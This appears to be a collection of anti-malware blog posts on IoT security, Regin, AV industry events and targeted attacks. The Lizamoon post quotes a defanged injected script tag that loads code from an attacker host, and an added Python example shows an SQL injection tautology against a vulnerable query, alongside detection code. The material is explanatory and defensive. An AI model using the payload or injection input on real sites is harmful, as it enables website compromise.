The Reference in Independent Anti-Malware Advice and Information


Internet of (Things) Trouble … the continuing story

Is the IoT industry making the same mistakes again?

Half a year ago I wrote about the problems we expected from IoT. And guess what? Unfortunately, we were right. It has even got worse in the past six months: nearly everything described back then has since been exploited. And that is not a good thing.

The Car Industry

Hacked cars in particular made the headlines, from online news sites to the biggest broadcasters in the world. Examples include Fiat Chrysler recalling 1.4 million vehicles after the Jeep hack, and a Corvette whose brakes could be controlled remotely. These cases confirmed the problems across the whole car industry that we described in our earlier post (e.g. the BMW issue).

The Fitness Industry

Completely different, but just as much part of the Internet of Things, are the new wristbands, step counters and other mobile fitness devices, together with the data they gather on the device, on your smartphone and in the cloud. An interesting test was performed by AV-Test, a well-known independent test organization for security products. It tried to measure how private fitness data is transferred from the devices to the smartphone or the cloud, and how secure the fitness trackers' apps are. You can find the full test here. These fitness wristbands are very popular and already a trend: all activity results are recorded and analyzed in an app on the user's smartphone, so the user can immediately see how well he or she performed. The questions remain, however: is the data transported securely from the wristband to the smartphone? Can someone intercept this link and copy or even manipulate the data? Could the app itself be manipulated? To investigate, nine fitness wristbands and trackers, together with their Android apps, were monitored in live operation. How well did those trackers perform in terms of security, and how easy is eavesdropping?

The AV community mourns for Klaus Brunnstein

The Viren-Test-Center’s founder passed away in May 2015, at the age of 77.

Brunnstein was born in Cologne and was later based in Hamburg. Working at the University of Hamburg, he influenced computer science education worldwide. He will certainly be remembered by many colleagues, family and friends.

Klaus Brunnstein (25 May 1937 - 19 May 2015)

A man we all will miss!

Klaus was one of the founders of CARO (the Computer Anti-Virus Research Organization), an organization established in 1990 to research and study malware. CARO planned to create another official and public organization called EICAR, aimed at antivirus research and improving the development of security software. It was during the inaugural meeting of EICAR in Brussels, Belgium, in 1991 that I met Klaus for the first time.

While talking to Klaus, I learned about so many new aspects of viruses, and that made me even more interested in the whole matter. Some of his ideas were very controversial, while others, on the contrary, were rather conservative. His ideas inspired me in many of the security-related topics, events and publications I touched, visited and launched afterwards. You could say that without Klaus, and without my first encounter with a Trojan horse back in 1989, I would not have ended up in the security industry at all.

I still remember Klaus for his interesting discussions and points of view on a closed security forum. Actually, I still have all of his feedback in my backup system; some of these old mails go back 19 years! I always stayed in contact with Klaus and met him at many security-related events, such as the early EICAR conferences in the nineties.

During one of the most recent CARO workshops, I told him about a book I was writing, and he told me he would always be there if I needed advice. For that reason, several months ago, I asked him to write an opinion chapter about the future of security for my book “Cyber Danger” (the German version, “Cybergefahr”, will be published later this year). I now realize that these will most probably be the last words he officially wrote for a book. Klaus will always be remembered as a pioneer. I was greatly saddened to learn of his death yesterday. He contributed so much to the industry.

Klaus, I still owe you a copy of my book! Somewhere. Sometime.

Regin, an old but sophisticated cyber espionage toolkit platform

Malware can be named in one breath with Stuxnet & Co.

Regin is one of the latest cyber-espionage toolkits, targeting a range of organizations, companies and individuals around the world. The malware is very sophisticated and can be mentioned in the same breath as other cyber-espionage campaigns such as Duqu, Stuxnet, Flame and Uroburos (aka Snake/Turla). First publicly reported by Symantec[1], Regin stayed under the radar for years.

G DATA experts have worked on this rootkit for quite a while, so we gathered some data of our own. The first Regin version we identified was in use in March 2009; its compilation timestamp is July 2008:

paul@gdata:~/regin$ ./ b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047
File:    b12c7d57507286bbbe36d7acf9b34c22c96606ffd904e3c23008399a4a50c047
Size:    12608 bytes
Type:    PE32 executable (native) Intel 80386, for MS Windows
MD5:     ffb0b9b5b610191051a7bdf0806e1e47
SHA1:    75a9af1e34dc0bb2f7fcde9d56b2503072ac35dd
Date:    0x486CBA19 [Thu Jul  3 11:38:01 2008 UTC]
EP:      0x103d4 .text 0/4

Some sources go back as far as 2003, but this is unclear at the moment. We can, however, confirm that the campaign was active by early 2009.

An Open Source detection tool provided by G DATA

We identified the use of an encrypted virtual file system. In the version mentioned above, the file system is a fake .evt file in %System%\config. The header of the virtual file system is always the same:

typedef struct _HEADER {
    uint16_t SectorSize;       /* sector size in bytes (0x1000 in the sample below) */
    uint16_t MaxSectorCount;
    uint16_t MaxFileCount;
    uint8_t  FileTagLength;
    uint32_t crc32custom;      /* 32-bit: the value printed below (df979328) is 8 hex digits wide */
} HEADER;

In the samples we analyzed, the checksum was a CRC32 (the custom variant named in the header). A generic way to detect an infection is therefore to look for the virtual file system itself: parse the header at the start of the file and verify that the custom CRC32 value stored there matches the one you compute.
The Python script can be downloaded from the original G DATA article (link see below). SHA256: 98ac51088b7d8e3c3bb8fbca112290279a4d226b3609a583a735ecdbcd0d7045 MD5: 743c7e4c6577df3d7e4391f1f5af4d65

And here is the output when a virtual file system is scanned:
paul@gdata:~regin$ ./ security.evt
SectorSize:  1000
MaxSectorCount:  0500
MaxFileCount:  0500
FileTagLength:  10
CRC32custom:  df979328
CRC of the file: df979328
Regin detected
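The following is an added example of how such a header check can be implemented; it is not the G DATA script referred to above and it does not know Regin's real checksum table. It assumes the header is stored little-endian without alignment padding, that the checksum covers the seven header bytes preceding it, and it uses the standard CRC-32 as a stand-in for the custom variant, passed in as a parameter so the real routine can be dropped in. The sample blob it tests itself against is constructed, not a real Regin artefact.

```python
"""Heuristic check for a Regin-style encrypted virtual file system (VFS) header.

Added example; this is NOT the G DATA script referred to in the article.
Assumptions, none of which the article confirms:
  * the header is little-endian and packed (no alignment padding):
    SectorSize u16 | MaxSectorCount u16 | MaxFileCount u16 |
    FileTagLength u8 | crc32custom u32  (11 bytes);
  * crc32custom covers the 7 header bytes that precede it;
  * Regin's custom CRC32 is stood in for by the standard CRC-32
    (zlib.crc32); pass the real routine as crc_fn once you have it.
"""
import struct
import sys
import zlib
from typing import Callable, NamedTuple, Optional

CrcFn = Callable[[bytes], int]

HEADER_FMT = "<HHHBI"                      # little-endian, packed (assumption)
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 11 bytes
CRC_OFFSET = HEADER_LEN - 4                # crc32custom is the last field


class VfsHeader(NamedTuple):
    sector_size: int
    max_sector_count: int
    max_file_count: int
    file_tag_length: int
    crc32custom: int


def parse_header(data: bytes) -> Optional[VfsHeader]:
    """Parse the fixed-size header; None if the blob is too short."""
    if len(data) < HEADER_LEN:
        return None
    return VfsHeader(*struct.unpack_from(HEADER_FMT, data, 0))


def plausible(hdr: VfsHeader) -> bool:
    """Reject headers whose fields make no sense, so that an unrelated file
    whose checksum happens to match is not flagged. The bounds are this
    example's own choice, loosely modelled on the values printed in the
    article (0x1000 / 0x500 / 0x500 / 0x10)."""
    return (hdr.sector_size in (0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000)
            and hdr.max_sector_count > 0
            and 0 < hdr.max_file_count <= hdr.max_sector_count
            and 0 < hdr.file_tag_length <= 0x40)


def crc32_alt(data: bytes) -> int:
    """Illustrative stand-in for a non-standard CRC32 (standard CRC-32 with a
    different initial register). It exists only to show that the checker is
    parameterised over the checksum routine; it is not Regin's table."""
    return zlib.crc32(data, 0xFFFFFFFF) & 0xFFFFFFFF


def header_checksum(data: bytes, crc_fn: CrcFn = zlib.crc32) -> int:
    """Checksum of the header bytes that precede crc32custom (assumed coverage)."""
    return crc_fn(data[:CRC_OFFSET]) & 0xFFFFFFFF


def is_regin_vfs(data: bytes, crc_fn: CrcFn = zlib.crc32) -> bool:
    """True if the blob starts with a plausible, self-consistent VFS header."""
    hdr = parse_header(data)
    if hdr is None or not plausible(hdr):
        return False
    return header_checksum(data, crc_fn) == hdr.crc32custom


def scan_file(path: str, crc_fn: CrcFn = zlib.crc32) -> bool:
    """Read just the header of a file on disk (e.g. a suspicious .evt file
    under %System%\\config) and test it."""
    with open(path, "rb") as fh:
        return is_regin_vfs(fh.read(HEADER_LEN), crc_fn)


def build_sample(sector_size: int = 0x1000, max_sectors: int = 0x500,
                 max_files: int = 0x500, tag_len: int = 0x10,
                 crc_fn: CrcFn = zlib.crc32, corrupt: bool = False) -> bytes:
    """Constructed test blob, not a real Regin artefact: a header with a
    self-consistent checksum followed by zero padding. corrupt=True flips one
    checksum bit to model a file that merely resembles the header."""
    body = struct.pack("<HHHB", sector_size, max_sectors, max_files, tag_len)
    crc = crc_fn(body) & 0xFFFFFFFF
    if corrupt:
        crc ^= 1
    return body + struct.pack("<I", crc) + b"\x00" * 64


if __name__ == "__main__":
    # Usage: python <this script> <file> [<file> ...]
    for name in sys.argv[1:]:
        with open(name, "rb") as fh:
            head = fh.read(HEADER_LEN)
        hdr = parse_header(head)
        if hdr is not None:
            print(f"SectorSize: {hdr.sector_size:04x}  MaxSectorCount: {hdr.max_sector_count:04x}  "
                  f"MaxFileCount: {hdr.max_file_count:04x}  FileTagLength: {hdr.file_tag_length:02x}")
            print(f"CRC32custom: {hdr.crc32custom:08x}  computed: {header_checksum(head):08x}")
        print(f"{name}: {'Regin detected' if is_regin_vfs(head) else 'no match'}")
```

Two design points matter for a check like this. A self-checksum alone is weak evidence, since an 11-byte header with a 32-bit check will match roughly one unrelated file in four billion, which is why the field-plausibility test is kept in front of it. And the detection is only as good as the checksum routine and its coverage: with the standard CRC-32 the script above will not flag a real Regin container, so take the actual custom routine and the byte range it covers from the G DATA script and pass it in as crc_fn.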


So far, victims of Regin have been identified in 14 countries:

  • Algeria
  • Afghanistan
  • Belgium
  • Brazil
  • Fiji
  • Germany
  • Iran
  • India
  • Indonesia
  • Kiribati
  • Malaysia
  • Pakistan
  • Russia
  • Syria

Perhaps the most publicly known victim of Regin is Jean-Jacques Quisquater, a well-known Belgian cryptographer. Kaspersky Lab stated this in their report.

Even more interesting is that Regin appears to be the spyware behind the Belgacom case, in which the large Belgian telecom provider was hacked in 2013. Belgacom acknowledged the hack but never provided details about the breach. Ronald Prins of Fox-IT, which assisted with the forensics and investigation of the Belgacom case, indicated on Twitter that Regin could well be the malware behind it.

The Intercept, a publication of First Look Media, not only connects Regin to Belgacom but also names the European Union as a potential victim, in an article published on November 24th.

The evolution of anti-virus solutions continues – Antivirus is not dead!

Anti-virus has evolved for the last 25 years and will continue to do so for the next 25 years

“Anti-virus is dead” – again. AV has been dying for decades. Fifteen years ago Dr. Alan Solomon, a highly respected security expert and founder of a pioneering anti-virus company, made the same statement. AV also supposedly died when the first behavior-based products entered the market. Whenever new threats appear, the failure of AV products is pointed out and their terminal illness is proclaimed. But – surprise, surprise – AV is still there!

Actually, this is exactly what Alan Solomon wanted to point out: AV is, and always will be, in an evolving state. He foresaw that anti-virus programs would evolve from pure signature-based detection to other technologies such as heuristics and behavioral detection, and on to more advanced protection methods. And now, with targeted attacks (aka APTs) and nation-state spying as new players in the threat landscape, AV is taking another step in its evolution.

AV solutions are an important layer in the defense for enterprises

So what is it about this time? A couple of days ago it was Brian Dye, Senior Vice President of Information Security at Symantec, who claimed that anti-virus is dead, in an interview with The Wall Street Journal. Unfortunately, the headline “AV is dead” is easily misinterpreted by a wide audience once it is taken out of context.
The statement was part of a description of Symantec's product strategy for business customers. It is nothing new that AV solutions are a baseline protection against common threats. They are well established and therefore play only a minor role when the strategic aspects of upcoming security solutions against dedicated attacks are outlined. And in the complex environment of a company network, a wide range of specialized protections is required. But Dye's statement was never meant to say that AV products are useless. He simply said that it takes more than an AV product to protect a company's IT infrastructure. And this is undoubtedly true.

IoT: The Internet of Things… ehm… Trouble?!

A balancing act between usability and security

Twenty years ago I first included a slide in my presentation about sending spam via a refrigerator. At the time, most people found that ridiculous. Yet last year it became a reality. Refrigerators have now become ‘smart’ and can do a whole lot more than just keep things cool.

The Internet of Things (IoT) gives everything an IP address so that everything can communicate with more or less anything and anyone else. The benefits and possibilities are almost infinite. But aren't these technological developments evolving rapidly, maybe too rapidly? Smart TVs, gaming consoles, tablets, smartphones and cars can eavesdrop on us. The cameras in your laptop, smartphone and smart TV can watch us when we don't want them to. Samsung is amending its user agreements to reassure people about the voice control on its smart TVs. BMW is rolling out a software update for the ConnectedDrive system in 2.2 million cars to stop attackers from easily unlocking the doors. These are the first signs that perhaps too much has been started without enough reflection.


25 years with or within the Antivirus and Security Industry

Last week (9 December 2014) it was exactly 25 years ago that one of my former managers gave me a diskette that turned out to contain the AIDS Information Trojan. At the time I was one of the first in the world to have a detection for it and to be able to restore a trojanised machine to a healthy one. It changed my life completely. Two years later I was one of the founders of EICAR. After that my whole life was dedicated to malware and security, and I finally became what I always wanted to be: a Security Evangelist, or rather a cybersecurity expert with deep knowledge of security and the skills to explain technical matters to non-technical people. If you want to refresh your memory about the AIDS Trojan, you can watch my first TV interview (Dutch, VTM) from 9 December 1989 and see that I have changed a little.

I love what I'm doing. It's my life, and I'm one of the few who are not doing it only for the money. During those 25 years I have met a lot of interesting, brilliant and enthusiastic people. The AV industry itself is also quite special, and I still like working with or inside it, even after 30 years of IT experience (not counting my university and school years). However, some of the people involved are not always what they pretend to be and just do their job. It's just a job for them.
It's not a job for me, it's much more: it's my life.

And take it from me, there is a big difference when you are driven by the principle of helping the general public, companies and organizations in today's continuous battle against cybercrime.

I am ready for the next 25 years... well, that's maybe a little bit exaggerated. ;-)

PS: If you find fewer blog posts from me over here these days, just visit the blog page of G DATA, follow my Twitter feed @EddyWillems or watch the media in your country.

Book Launch ‘Cybergevaar’

IT security Information for everybody

I finally did it. At the beginning of October 2013, the Belgian publisher Lannoo and I officially launched ‘Cybergevaar’ in Belgium and the Netherlands. It was not an easy job, I can tell you, but I had always wanted to do this. It took me about 8 to 9 months to write and finalize it. That is also part of the reason why I did not blog that often during that period.

“Writing a book about cyber threats in a comprehensible and comprehensive way is not an easy task, but the book ‘Cybergevaar’ succeeds in this”, says the book's first review, by the well-known Belgian IT magazine Datanews. “Cybergevaar” aims to give a very readable and accessible overview of almost every information-security problem and kind of malware. It reaches out to a general audience: it does not only target the technically savvy reader but provides information for everybody.


“Cybergevaar” starts with an overview of the history of malware and looks into the many profiles of malware writers and hackers. One chapter covers the underground economy, using many examples to explain who is involved and how; it is based on a whitepaper written by G Data SecurityLabs. Furthermore, new developments in the fields of cyber attacks, sabotage and espionage are discussed from different angles. The daily threats and the myths about malware are described in detail. In addition, the chapter with general security tips and tricks is interesting for everybody, and a special chapter offers thorough advice for companies.

While exploring the book, the reader will find several exciting security anecdotes and entertaining situations one has possibly never heard of before. Additional clarifications are provided throughout by attractive illustrations and easy-to-understand graphs. High-level opinions of people with experience and interest in the ICT security industry are included; professionals such as Natalya Kasperskaya (InfoWatch), Ralf Benzmüller (G Data), Peter Kruse (CSIS Security Group) and Bob Burls (Independent IT Security Consultant) are among the contributors. The book also elaborates on how governments and the media can play a role in ‘educating’ users. Moreover, it gives an inside look into the computer security industry and organizations like AMTSO and EICAR. And, of course, ‘Cybergevaar’ does not miss the opportunity to highlight how the problem and its solutions may develop in the future, in a special chapter in the form of a short story, ‘Radical Ransom’, set in the year 2033.

“Cybergevaar” by Eddy Willems, Lannoo, 213 pages, is now available in Belgian and Dutch bookstores and online shops. Plans to publish the book in other languages, such as German and English, are currently being discussed.



Cold Cyber War

About the abuse of sensational catchwords

Over the last few months there has been an astounding increase in media attention around the theme ‘cyber war’. From blogs to newspapers to TV, everywhere we hear statements about how a cyber war is on the verge of breaking out. But is that true?

When I think of the word ‘war’, I think of a situation in which two or more sides attack one another, and the attacks lead to casualties. This should also be the case in a so-called cyber war. Nothing like that has yet been seen, and quite frankly, I don't think we will see it materialize soon.


Happy New malware Year

A turbulent beginning of 2013

Every holiday season, almost nothing feels better than giving someone you care about the one gift he or she truly wanted. We are all more than happy to enjoy a couple of days off, but it seems as if the bad guys used these days to dig up exploits and other bugs in the software we use and to present the world with their ‘special’ New Year gifts. Let us have a look at how the year started and sum up a couple of threats we saw during the past weeks.

The threats fall on two major fronts. Ruby on Rails, Java and Microsoft's Internet Explorer form the first, all web-related. Then there are the flaws in Foxit Reader and Microsoft's Windows RT, which also came into the line of fire.


Make updates! Restart your computer!

Pornography alarm or reboot?

After years of insisting on the importance of updating and patching, most people know by now that it is wise to install updates. Unfortunately, many people think only of operating system updates. They neglect so-called third-party software, Adobe Reader (PDF), Adobe Flash and Oracle Java in particular and all other software in general, which is a huge mistake.

But there is another pitfall: most computer users do not realize that many software updates not only need to be installed, but also require a restart of the computer before the patches take effect. The combination of ignorance, impatience and laziness is fatal in this respect.

The safety of a PC stands or falls with the combination of your security software, the updates of the OS and other software, and especially your own behavior. Very often, the Achilles heel of PC security is human procrastination.
Users often do not want to shut the PC or laptop down completely because start-up takes too long. Simply closing the laptop lid or putting the PC to sleep or into hibernation is a habit most readers will recognize, and a machine that is never restarted never finishes applying the patches that need a reboot. Tablets have made this even worse: those devices are ready to use in an instant and have made us even more impatient.

Windows 8: Malware-free?

We have always liked Microsoft's operating systems, as most of them are widely adopted around the world and their security has been improving for years. The new incarnation, Windows 8, is somewhat different from its predecessors, as the interface has undergone some notably big changes.

Windows 8 offers the same interface on many devices, from the Xbox via the desktop to tablet PCs and smartphones. Microsoft is trying to create an almost universal user experience. Nevertheless, it appears that the functionality of apps under Windows RT (the version for ARM tablets) and of the programs in the desktop version is not always the same.

You might think that a very similar interface on different devices lets you do the same things on different hardware, but that does not seem to be true in all cases. Sometimes the decision to change the user experience and usability is a matter of security, which is to be welcomed, but all in all it confuses the user.
A good example is Microsoft's own Skype. You can use it on any Windows device, but it is impossible to send files under Windows RT, most likely because of the security restrictions imposed by the sandboxing approach. From a user's point of view that is an ambiguous feature. And it is not the only critical point we have.


The AVAR conference 2012 in Hangzhou, China

IT security specialists discuss and shape their industry’s future

This week, the AVAR Conference is taking place in Hangzhou, China. G Data is attending the conference and participating in many of the organized events. Several pre-meetings, such as the AVPD (Anti-Virus Product Developers) meeting and the WildList meeting, have already taken place. All these discussions and efforts will ultimately result in improvements to future products, to security tests and to overall security for users.


This year's AVAR Conference covers a lot of trending topics, ranging from mobile malware to botnets. Seiji Murakami, Chairman of AVAR, traditionally opened the conference with a warm welcome speech. This year, the keynote speeches focused on Android security product testing (AV-Test), preventive action against malware in China (CERT China) and malware trends (Microsoft).

IT security specialists gathered for the 15th edition of the conference, which has always tried to highlight the specific problems of Asian malware. One of the main topics here is ‘working together against cybercrime’, which is, unfortunately, not always easy.

If you are interested in the agenda and information about the other topics discussed, you can find a lot of information on the AVAR Conference 2012 website. Furthermore, more info about the next conference’s venue and future topics will also follow on the official AVAR homepage.

This article can be found also on the G Data Blog.

The lack of basic security and good consultancy in a world dominated by an economical crisis

Why basic antivirus is not failing.

A lot has been written and said about antivirus products seemingly failing these days to protect users against advanced persistent threats or specific targeted attacks. The anti-virus industry seemed unable to detect threats like Stuxnet, Duqu, Flame or, recently, Dorifel in time. Media and press called some of those attacks acts of cyberwarfare. Richard A. Clarke, an internationally recognized security expert, defines cyberwarfare as “actions by a nation-state to penetrate another nation's computers or networks for the purposes of causing damage or disruption.” There are loads of other definitions. However, it is clear that cyberwarfare encompasses many different threats, from sabotage and espionage to national security breaches and attacks on the critical infrastructure of a region or country. The malware used was most likely developed by an organization with a lot of money behind it, and it is among the first signs of what could be called cyberwarfare.

So several companies and the general public claimed that we were all too late in stopping these threats. In the case of Flame, the AV industry found out that we already had some samples of it when the news became public, but we were not aware of what they were: the samples had never been verified as malicious. Stuxnet, too, had gone undetected for over a year before it was found.

So the question might be: is the anti-virus industry ready for the next battle? Can we all, with our tight, consumer-oriented antivirus budgets, stand up to targeted malware or APTs created by organizations with a lot of money?


This website is 17 years old!

Back in 1995, at the end of August, I started this website as one of the first anti-virus and security sites in the world. Today I nearly forgot this anniversary. The reason is that the speed of news and the number of malware-related problems have been growing like hell. The amounts of data and malware we see these days are excessive. I am personally involved with all of this much more (24 hours a day, 7 days a week) than in 1989, when it all started for me. The hacks we see these days are worrying. People's mentality seems to have changed dramatically, and hacking (read: ‘cracking’) seems to be as normal as having dinner. Cyberwarfare, cybersabotage and cyberespionage are now also part of the problem. I wish I could say after 17 years: ‘Yes, we've done it, we (the AV and security industry) solved the malware problem’, but I am now sure that this is wishful thinking and never will be the case. However, this battle isn't over yet. Malware writers, hackers and other cybercriminals: be prepared, the laws are changing too; maybe you could start thinking about finally turning your skills in a good direction. I hope nations will think twice before writing nation-state malware or even thinking of hacking back the hackers. An eye for an eye makes the whole world blind (Mahatma Gandhi).


Three important AV industry events in a row

The month of May has always been dedicated to several traditionally important security industry events of the year. G Data is always present at these events and played a very important role this time.

While the EICAR conference 2011 was dominated by the buzzword cyberwar, the 2012 EICAR conference, actually the 21st, focused on ‘Cyber Attacks – Myths and Reality in Contemporary Context’. The conference took place at the Marriott Hotel in Lisbon.
The recent past has brought a considerable shift in the mentality of underground malware authors: a swing from the thrill-seeking geek striving for fame or glory to the professional criminal who exploits methodical techniques and, even more importantly, the inadequate expertise of the average user, for monetary gain. This contemporary threat scenario calls for an adaptation of technology and of defense methodologies. Even where scientific research provides the baseline for innovation, we still need a more holistic approach to implementing it. The conference therefore invited researchers to address these issues in their papers.
This year's event was another great one, and we are already looking forward to the next one, including some new initiatives from EICAR which should appear soon on EICAR's website. If things turn out as planned, the EICAR 2013 conference will be held in Cologne, Germany, 9-11 June 2013.

Several important events in one month

Four fruitful meetings and thriving events: G Data at AMTSO, RSA, CeBIT and Infosecurity Belgium

The end of February and March have always been dedicated to several traditionally important security industry events of the year. This year it started with an AMTSO meeting, followed by the RSA Conference, the biggest IT security conference in the US, in the beautiful city of San Francisco. CeBIT, held in Hannover, Germany, is still one of the most important events in the world for the digital industry. The RSA Conference and CeBIT are traditionally surrounded by many smaller security-related meetings, in which we also participated.


The good and the bad about AV multi scanner services

Online AV multi-scanners are used quite often these days. However, not every user is aware of these sites and of their possibilities and limits. Using the public online multi-scanner services can be useful, but the analysis results do not allow straightforward conclusions.

It is common for malware samples to remain undetected for hours or even days. G Data has comprehensive and fast malware detection through our cloud technology, but some users still want to know more about a particular suspicious file or even analyze it themselves.
One of the easiest ways to gather at least a minimum of the desired information is to use an online AV multi-scanner. The concept is interesting: when you find a suspicious file on your PC, you can upload it to the service and get an immediate result, as the file is scanned with various up-to-date virus scan engines. This principle has been around for years and gives you some immediate insight into a suspicious file. There are several such scan services around; the most popular is probably VirusTotal, but there are others such as Jotti, NoVirusThanks, Metascan and Virscan, to name only a few.

How does it work?
Let's have a look at one of the most popular services, VirusTotal. You can submit your sample on the website, or use the email submission feature, whatever suits your needs. Online, you can also search by hash value, meaning you can look up their existing database of scanned files by a SHA-1, SHA-256 or MD5 hash. This is handy if you do not have the actual file but know its hash, and it also lets you check a file that has already been seen without uploading it yourself.


Bug bounty initiatives: a summer approach against cyberthreats?

(This blog article has been published at the G Data Security Blog over here.)

The summer season has always been a mixture of holidays and the launch of new initiatives against cyberthreats, if you look back at the past months. One of the new initiatives comes from Microsoft in the form of the BlueHat Prize, a contest intended to generate new defensive approaches in computer security. By launching it, MS wants to foster new solutions to security threats, and there are interesting prizes for the participants, ranging from $10,000 to $200,000.
MS is known to hold internal research conferences as well, but this new program focuses specifically on new technology and defenses against memory-safety vulnerabilities. Microsoft clearly wants to encourage researchers to think about new ways of defeating entire classes of bugs, instead of paying for individual bugs as some other companies do.


Mobile and in-the-cloud OSes: Moving to the cloud, moving to different threats?

Lots of companies and home users ‘have their head in the clouds’, moving their services, servers and data to the cloud without realizing that they have already been using cloud services for a decade, and without ever having given any thought to the security of doing so. Even now, with financial incentives in play, they do not consider the security implications at all.

Where does a network stop these days? Where does the business network stop? This is no longer easy to define. Today, networks lack clear, crisp boundaries, and it becomes more and more difficult to say what is really inside and what is outside the corporate network. It also becomes harder and harder for normal users to protect themselves and to recognize the real risks behind every part of the network.


Mobile Payments, DroidDream and a Reactive Policy Add up to Major Headaches

Malware writers are entrepreneurs who are always looking for the best return on investment. The Android operating system, combined with the Google Wallet Service, will offer a record-setting ROI if current policies continue. Let’s look at why.

According to Gartner and IDC, Android is the market leader in mobile operating systems, so it is logical that cyber criminals will target the platform. Android malware can easily be spread through apps, which makes it an attractive target. Not only did the beginning of 2011 see the emergence of this trend; soon Android will take the lead as the most targeted mobile operating system in terms of malware.

Many of the problems result from the fact that apps can be distributed via different online stores and channels, and nobody except security experts is looking for malware inside the apps.

The first proof that the official Android Market is interesting for cybercriminals came in March 2011 with DroidDream, a malware family that uses a pair of exploits to gain root access on vulnerable Android devices. A large number of Android applications were reported to be infected, and all were pulled from the Android Market after it was reported to Google. All of the applications were versions of legitimate programs that had been trojanised and rebuilt by the malware authors with malicious code added. DroidDream sends a collection of information such as IMEI, IMSI and OS version to the attacker and then attempts to download additional software and payloads.


AMTSO, CARO and EICAR – conferences and events – an overview

The beginning of May was dedicated to three traditionally important security industry events of the year. It started with an AMTSO Meeting, then the CARO Workshop followed and it ended with the EICAR Conference. I participated for G Data in all of them!

You can find the original posting of this article at the G Data Security blog.

G Data is one of the members of AMTSO, an organization currently comprised of around 40 members, representing testers, vendors, academics and publishers involved in anti-malware research. I was at the last AMTSO members’ meeting, which was held in Prague. As always, a lot of work was done during the workshops: The document “AMTSO Guidelines on Facilitating Testability” was initiated at the suggestion of testers and developed jointly by testers and vendors. The new paper is the latest in a succession of guidelines and best practice documents already published. The AMTSO members also agreed to expand the range of documentation the organization produces to include more educational material. They also introduced changes to the voting procedure to ensure that documents cannot be approved by the members unless a majority of testers agree that the content is up to standard. This last step is designed to avoid any possibility of bias in favor of any group within the organization.


The Rise of the Targattacks*: Cyber espionage and sabotage: the new way

*Abbr.: targeted attacks

During the last 18 months we saw a growing number of targeted attacks against numerous companies and organizations. Let’s briefly have a look at some of them:

  • The Aurora Attack: an attack that began in mid 2009 and continued until December 2009. The primary goal of this attack was to gain access to high tech, security and defense companies and potentially modify source code repositories. For example at Adobe, Juniper, Google, Yahoo, etc…
  • German Emissions Trading Authority (DEHSt): suffered from phishing attacks carried out in January 2010. Scamsters circulated their fraudulent emails masquerading as email from the DEHSt and persuaded the recipients to login to a counterfeit website, ironically to protect themselves against alleged hacker attacks. Using the stolen access data, the attackers transferred emissions permits, primarily to Denmark and Great Britain, and in so doing allegedly gained up to three million Euros illegally. It is readily apparent that targeted phishing attacks can be very lucrative.
  • Stuxnet: a Windows computer worm discovered in July 2010 that targets industrial SCADA software and equipment with the aim of attacking an Iranian nuclear plant. The attack seems to have been successful, as the enrichment of uranium was heavily delayed.
  • G20 Files attack: was announced in March 2011 but had already been going on for several months. The G20 is made up of the finance ministers and central bank governors of 19 countries and discusses key issues of the global economy. Over 150 ministry computers of the G20 were attacked. The attacks aimed at files related to the G20 meetings.
  • RSA breach: RSA is a well known security company specialized in identity and access solutions. Hackers may have gained access to part of the code generation algorithm used in RSA SecurID tokens. At least some information was extracted but it’s still unsure if it will actually cause future problems.
  • EU Commission Summit attack: this was a targeted attack against some specific servers at the EU Commission in Brussels, found and stopped before the EU March 2011 Summit. As not much is known about it, we suppose that nothing important has been leaked.
  • Epsilon email breach: Epsilon is a well known online marketing company that is working with hundreds of large companies around the world and stores millions of email addresses in its databases. Hackers have stolen customer email addresses and names belonging to a “subset of its clients”. Some big companies such as Disney, Citibank, Verizon, etc. were involved.

And this list is still not complete.


It never stays quiet on the internet: The Lizamoon attack, the update problem?

It never stays quiet on the internet, and new attacks or malware are seen every day. Last week, however, we saw an interesting mass SQL injection attack, referred to as Lizamoon, which was spreading and infected several million URLs (March 29 until April 4). Even after a week, thousands of compromised websites still do not seem to have been cleaned up.

What are we talking about?
The mentioned attack uses SQL injection techniques to insert rogue code into the databases of websites. SQL injection is a code injection technique that misuses input-handling functionality which does not filter user-supplied data properly. In other words: The vulnerability is present when user input is not correctly filtered for escape characters embedded in SQL statements, or when the input is not strongly typed and is thereby unexpectedly executed (cf.: Wikipedia).

The following code was injected into a large number of websites:
<script src=hxxp://lizamoon . com / ur . php >
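As an added illustration (not code from the original post or from G Data), the mechanism behind a mass SQL injection campaign like Lizamoon, shown in Python against an in-memory SQLite database: a search query that pastes user input into the SQL text, its parameterised counterpart, and a scan of the stored page bodies for script tags that load from hosts outside an allowlist, the kind of check a site owner runs to find out whether a database has been seeded with foreign script tags. The table, its rows, the hostnames and the allowlist are constructed for this example.

```python
import re
import sqlite3

# Constructed sample data: a tiny CMS table whose body column an injected
# <script> tag would end up in. The hostnames are placeholders, not real sites.
SAMPLE_PAGES = [
    ("Home", '<p>Welcome</p><script src="https://www.example.org/site.js"></script>'),
    ("About", "<p>About us</p>"),
    ("Contact", "<p>Mail us</p><script src=http://malicious.example/ur.php ></script>"),
]


def setup_db():
    """Create an in-memory SQLite database holding the constructed pages."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages (title, body) VALUES (?, ?)", SAMPLE_PAGES)
    conn.commit()
    return conn


def search_unsafe(conn, term):
    """Vulnerable pattern: the user-supplied term is concatenated into the SQL
    text, so a quote character in the input changes the statement's structure."""
    sql = "SELECT id, title FROM pages WHERE title = '" + term + "'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Hardened pattern: the term travels as a bound parameter and is only ever
    compared as data, whatever characters it contains."""
    return conn.execute(
        "SELECT id, title FROM pages WHERE title = ?", (term,)
    ).fetchall()


# Captures the host of any <script src=...> whose URL names a scheme or host.
SCRIPT_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>]+)", re.IGNORECASE
)


def find_external_scripts(conn, allowed_hosts):
    """Scan every stored body for script tags loading from hosts outside the
    allowlist; returns (page id, host) pairs for follow-up."""
    hits = []
    for page_id, body in conn.execute("SELECT id, body FROM pages"):
        for host in SCRIPT_SRC.findall(body or ""):
            if host.lower() not in allowed_hosts:
                hits.append((page_id, host.lower()))
    return hits


if __name__ == "__main__":
    db = setup_db()
    tautology = "x' OR '1'='1"  # classic test input: the quote closes the literal early
    print("unsafe search:", search_unsafe(db, tautology))  # every row comes back
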